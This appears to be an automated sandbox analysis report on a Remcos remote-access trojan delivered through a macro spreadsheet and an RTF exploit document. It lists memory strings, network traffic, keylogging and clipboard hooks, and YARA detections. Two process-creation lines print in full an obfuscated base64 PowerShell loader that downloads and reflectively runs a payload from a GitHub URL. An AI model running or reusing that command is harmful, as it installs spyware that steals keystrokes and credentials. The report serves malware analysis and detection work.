                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 0000000E.00000002.473571085.00000000026E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: powershell.exe, 0000000C.00000002.478381867.000000000268B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473571085.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 0000000E.00000002.473571085.000000000249B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                    Source: powershell.exe, 0000000E.00000002.473571085.000000000249B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                    Source: powershell.exe, 0000000E.00000002.473571085.000000000249B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfq4;
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: strmr.co.url.5.drString found in binary or memory: https://strmr.co/
                    Source: a9ifFT.url.5.drString found in binary or memory: https://strmr.co/a9ifFT
                    Source: PO.xlsString found in binary or memory: https://strmr.co/a9ifFTN
                    Source: 62830000.0.dr, ~DF59A7707E25171593.TMP.0.drString found in binary or memory: https://strmr.co/a9ifFTyX
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.179.215:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49165 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000016_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,16_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,16_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,16_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,16_2_0040A41B
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1027741834.000000000239E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041CA73 SystemParametersInfoW,16_2_0041CA73

                    System Summary

                    barindex
                    Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C899BC08.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: PO.xlsOLE: Microsoft Excel 2007+
                    Source: ~DFCE2419FB28151868.TMP.0.drOLE: Microsoft Excel 2007+
                    Source: 62830000.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a9ifFT.urlJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\strmr.co.urlJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,16_2_004167EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043706A16_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041400516_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043E11C16_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004541D916_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004381E816_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041F18B16_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044627016_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043E34B16_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004533AB16_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0042742E16_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043756616_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043E5A816_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004387F016_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043797E16_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004339D716_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044DA4916_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00427AD716_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041DBF316_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00427C4016_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00437DB316_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00435EEB16_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DEED16_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00426E9F16_2_00426E9F
                    Source: PO.xlsOLE indicator, VBA macros: true
                    Source: ~DFCE2419FB28151868.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: ~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
